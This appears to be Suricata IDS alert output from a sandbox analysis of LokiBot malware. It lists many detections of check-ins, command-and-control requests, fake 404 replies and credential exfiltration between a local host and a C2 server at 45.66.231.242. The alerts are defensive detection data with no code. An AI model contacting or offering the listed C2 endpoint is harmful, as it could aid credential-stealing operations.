            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49805 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49788 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49772 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49773 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49801 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49774 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49841 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49841 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49841 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49771
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49777 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49730 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49772 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49788 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49773 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49788 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49732
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49754
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49805
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49825 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49769 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49825 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49772 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49772 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49763
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49744 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49753
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49776
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49825 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49742 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49772 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49825 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49788 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49788 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49841 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49774 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49841 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49756
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49737 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49777 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49767 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49740
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49829 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49738 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49801 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49788
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49801 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49801 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49792 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49769
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49792 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49800 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49827 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49801
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49827 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49827 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49737 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49807
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49821 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49752
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49831 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49811 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49783 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49811 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49783 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49783 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49738
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49800 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49780 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49780 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49829 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49737
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49735 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49733 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49827 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49827 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49773
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49811 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49742 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49742 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49812 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49812 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49779 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49780 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49783 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49779 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49783 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49841
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49829 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49760
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49780 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49772
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49819 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49819 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49777
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49825
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49824 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49824 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49824 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49767
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49749
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49812 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49736 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49739
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49787 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49787 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49787 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49779 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49834 -> 45.66.231.242:80
